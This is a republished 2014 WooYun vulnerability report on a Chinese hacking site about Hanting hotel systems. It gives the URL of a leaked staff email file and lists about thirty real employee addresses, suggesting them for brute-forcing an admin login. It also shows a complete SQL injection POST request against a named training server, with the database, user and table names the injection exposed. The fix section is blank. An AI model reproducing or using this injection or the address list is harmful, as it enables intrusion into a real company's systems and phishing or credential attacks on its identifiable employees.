记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

汉庭酒店某处信息泄漏&Post注入一枚

2014-04-28 22:25

#1.信息泄漏:这里泄漏了大量的用户Email用户名,6MB的TXT文档,通过收集这些用户名可以进行后台的爆破,因为后台没有验证码与错误登录次数限制。

http://jcxt.htinns.com/mail.txt



01.jpg



02.jpg



以下列举个别:

lpang@htinns.com

tshen@htinns.com

ttqin@htinns.com

hjin@htinns.com

xuemfeng@htinns.com

wanglia@htinns.com

liyi@htinns.com

kaiguo@htinns.com

yhzhao@htinns.com

bingli@htinns.com

hfhua@htinns.com

hzhu@htinns.com

xhzhang@htinns.com

yonghli@htinns.com

djzhan@htinns.com

zplu@htinns.com

dhhong@htinns.com

tangyj@htinns.com

clwu@htinns.com

ffwang@htinns.com

lzwang@htinns.com

wyyao@htinns.com

yzfeng@htinns.com

szzhao@htinns.com

clwu@htinns.com

zhangfana@htinns.com

lpchen@htinns.com

xiaoliu@htinns.com

xcrlding@htinns.com

漏洞证明:

#2.Post注入一枚:



POST /exam2/login.asp?win= HTTP/1.1

Host: training.htinns.com

Proxy-Connection: keep-alive

Content-Length: 36

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://training.htinns.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://training.htinns.com/exam2/

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: Hm_lvt_e5770a47472445b3f839a58a32b8abe5=1394799212; Hm_lpvt_e5770a47472445b3f839a58a32b8abe5=1394799385; ASPSESSIONIDCSAQQQQQ=APGAMJPALKBMAOBPDBGIMADM; id=admin%27; %2Fbbs%2FGROUP=1



username=admin&password=admin&czbz=1





available databases [48]:

[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0

[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618

[*] dbcenter

[*] dnt31

[*] eCell6

[*] Exam1

[*] HT_eProcurement

[*] HTFranchisee

[*] HtinnsAdviser

[*] HTIntranetUAT

[*] HTScore

[*] InnInspection

[*] InspectionAudit

[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972

[*] master

[*] model

[*] msdb

[*] OA

[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509

[*] PnCheck

[*] PurchaseSurvey

[*] RCTIDB

[*] ReportServer

[*] ReportServerTempDB

[*] ROOMCHK

[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475

[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9

[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccb

[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4

[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5

[*] SharePoint_Config

[*] slam

[*] StateService_23c5611220344b52bea83c8d6fd7ddc8

[*] tempdb

[*] test

[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0

[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab

[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735

[*] USERPLUS

[*] VHArchives_HanTing

[*] WebAnalyticsService????_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186

[*] WebAnalyticsService????_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43

[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333

[*] WSS_Content

[*] WSS_Content_90

[*] WSS_Content_b3117e51d8c8405888a80388555ec208

[*] WSS_Logging

[*] YunYing





database management system users [2]:

[*] PowerExamUser

[*] sa





Database: Exam1

[41 tables]

+--------------------+

| dbo.BbsClass |

| dbo.BbsMain |

| dbo.Cjdxm |

| dbo.Denglu |

| dbo.Fenzu |

| dbo.Fenzu_Renyuan |

| dbo.Ftp_Cs |

| dbo.Ftp_Kc |

| dbo.Glyftpqx |

| dbo.ImgKu |

| dbo.Kaoshi_Detail |

| dbo.Kaoshi_Master |

| dbo.Kaoshi_daan |

| dbo.Kc_Main |

| dbo.Kc_Ren |

| dbo.Kc_lb |

| dbo.Ksj_Cl |

| dbo.Ksj_Cl_Temp |

| dbo.Ksj_Gd_Detail |

| dbo.Ksj_Main |

| dbo.Ksj_Ren |

| dbo.Mrfz |

| dbo.OperLog |

| dbo.Reninfoset |

| dbo.Renyuan |

| dbo.RenyuanInfo |

| dbo.ScoreView |

| dbo.Sjglqx |

| dbo.TZ |

| dbo.TiKu_Detail |

| dbo.Tiku_Main |

| dbo.Tkj |

| dbo.Tkjgl |

| dbo.Tmlb |

| dbo.Txfs |

| dbo.Txsx |

| dbo.Txxz |

| dbo.UserExamRecord |

| dbo.Userinfo |

| dbo.Zhsz |

| dbo.dtproperties |

+--------------------+

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-053667

阅读:120188 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“汉庭酒店某处信息泄漏&Post注入一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云